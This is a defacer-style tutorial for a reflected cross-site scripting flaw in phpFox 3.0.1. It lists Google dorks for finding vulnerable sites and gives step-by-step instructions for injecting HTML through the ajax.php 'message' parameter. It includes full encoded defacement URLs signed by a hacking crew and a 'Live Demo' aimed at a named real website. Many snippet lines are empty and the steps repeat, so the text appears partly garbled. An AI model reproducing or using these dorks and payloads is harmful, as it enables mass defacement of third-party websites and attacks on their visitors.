phpFox XSS Vulnerability
Finding Vulnerable Target
Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"
1- Choose any dork and paste on Google
2- Choose any site
Exploiting Target
1- So, your site would be like this or something similar,
www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc
2- Now, change the error message with your HTML tags or anything you want.
To show Header
To show header in center
To show Title
Hacked
To Add a Image
To add a Message
To write message in next lines
To add a scrolling Text
To Add a alert box
To add background colour in page
To Add a full deface Page
Hacked!
3- So it would be like this,
http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
Live Demo:
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
2- Now, change the error message with your HTML tags or anything you want.
To show Header
Hacked
To show header in center
Hacked
To show Title
To Add a Image
To add a Message
Your Message Here
To write message in next lines
First line
Second Line
To add a scrolling Text
To Add a alert box
To add background colour in page
To Add a full deface Page
XSSed!
./BL4CK E4GL3 W4S H3RE
3- So it would be like this,
http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
Live Demo:
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E
